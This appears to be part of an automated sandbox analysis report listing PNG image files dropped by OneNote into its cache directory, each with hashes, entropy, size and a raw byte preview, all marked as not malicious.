                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
